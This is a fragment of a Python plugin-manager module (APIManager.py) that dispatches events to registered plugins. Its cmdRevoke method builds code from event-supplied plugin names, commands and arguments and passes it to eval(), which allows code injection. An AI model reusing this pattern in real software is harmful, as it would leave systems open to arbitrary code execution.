\"\"\"\n ReadMessage Method is for being a Linstener\n arg1: A event - type: Event()\n \"\"\"\n #self.PLUGINS[\"CommandLine\"].ReceiveMessage(self.PLUGINS, event.data, str_list=False)\n if event.type_ == EType.DEFAULT:\n # Enable DEFAULT Interfaces\n if event.data[\"target\"] == \"revoke\":\n self.cmdRevoke(event.data[\"cmd\"],\n event.data[\"plugin\"],\n event.data[\"args\"])\n #print(event)\n if event.data[\"target\"] in self.PLUGINS:\n # print(\"yes\")\n # self.PLUGINS[\"CommandLine\"]().ReceiveMessage()\n self.PLUGINS[event.data[\"target\"]].ReceiveMessage(\n self.PLUGINS,\n event=event)\n else:\n self.logger.printError(\"Calling \"+event.data[\"target\"], target=\"APIManager\")\n # else:\n # print(\"Not in the list of plugins\")\n\n #for func in self.PLUGINS:\n # func().ReceiveMessage(self.PLUGINS,event., event.data, str_list=False)\n #self.PLUGINS[\"CommandLine\"]()\\\n # .ReceiveMessage(self.PLUGINS, event.data, str_list=False)\n #pass message back to plugins\n pass\n\n def SendMessage(self, event):\n \"\"\"\n SendMessage Method is for being an Event Source\n arg1: Event(event)\n \"\"\"\n #print(event)\n self.EventManager.SendEvent(event)\n\n\n def cmdRevoke(self, cmd, plugin=\"\", args=[]):\n \"\"\"\n cmdRevoke calls a method in the specified plugin object\n arg1: string(cmd) the cmd is going to revoke\n arg2: string(plugin) the the plugin object of the method\n arg3: args (need to implement)\n \"\"\"\n if plugin is ():\n print(\"No specified plugin\")\n return\n else:\n if args != []:\n self.SendMessage(eval(\"self.PLUGINS[\\\"\"+plugin+\"\\\"]().\"+cmd+\"(self.PLUGINS, \"\n + str(args)+\")\")) # Send args as str\n # self.PLUGINS[plugin]().cmd(args) # Fucked up\n else:\n self.SendMessage(eval(\"self.PLUGINS[\\\"\"+plugin+\"\\\"]().\"+cmd+\"(self.PLUGINS\"\n +\")\")) # Send args as str\n\n @classmethod\n def plugin_register(cls, plugin_name):\n def wrapper(plugin):\n obj = object.__new__(plugin)\n cls.PLUGINS.update({plugin_name:obj})\n obj.__init__(cls.PLUGINS_EVENTS_QUEUE, cls.logger)\n print(plugin_name+\" has been activitied.\")\n return obj\n return wrapper\n","sub_path":"Smartiome/Core/APIManager.py","file_name":"APIManager.py","file_ext":"py","file_size_in_byte":3651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}